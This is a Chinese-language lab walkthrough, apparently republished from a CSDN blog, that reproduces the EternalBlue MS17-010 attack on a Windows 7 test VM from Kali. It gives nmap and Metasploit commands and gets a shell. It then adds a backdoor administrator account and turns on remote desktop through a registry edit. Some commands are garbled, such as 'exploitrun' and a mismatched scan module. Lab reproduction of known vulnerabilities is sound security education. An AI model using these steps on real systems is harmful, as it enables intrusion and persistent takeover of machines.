0


永恒之蓝ms17_010漏洞复现

1.复现准备

攻击机:Linux kali(IP:192.168.52.132)

靶机:Windows 7(x64)(IP:192.168.52.130)

条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)

2.复现过程

登录 kali linux,用 nmap 探测本网段存活主机

nmap 192.168.52.0/24

可以看到靶机的445端口已开启

3.使用永恒之蓝漏洞

打开MSF:msfconsole

搜索 ms17-010 代码:search ms17_010

使用以下模块:

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块

exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。

扫描模块:

use auxiliary/admin/smb/ms17_010_command

设置目标IP或网段:set rhosts 192.168.52.130

执行扫描:exploitrun

出现以下情况说明存在漏洞

攻击模块:

use exploit/windows/smb/ms17_010_eternalblue

设置目标IP或网段:set rhosts 192.168.52.130

执行攻击:exploitrun

显示“win”说明攻击成功

4.得到靶机shell

得到靶机shell:shell

输入:chcp 65001 解决乱码问题

5.对靶机进行控制

创建新用户:net user lll 456789 /add

将用户添加至管理员组:net localgroup administrators lll /add

开启远程桌面功能

netstat -ano查看3389端口是否开启(3389端口是Windows 2000(2003) Server远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器)

若未开启,REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
为开启命令

6.远程桌面连接靶机

快捷键ctrl+alt+t另起一个终端输入命令:rdesktop 192.168.52.130

如图点其他用户进行登录,永恒之蓝漏洞就完成啦!

标签: 安全 web安全 网络

本文转载自: https://blog.csdn.net/m0_73005107/article/details/128085825
版权归原作者 小檀bo菠 所有, 如有侵权,请联系我们删除。

“永恒之蓝ms17_010漏洞复现”的评论:

还没有评论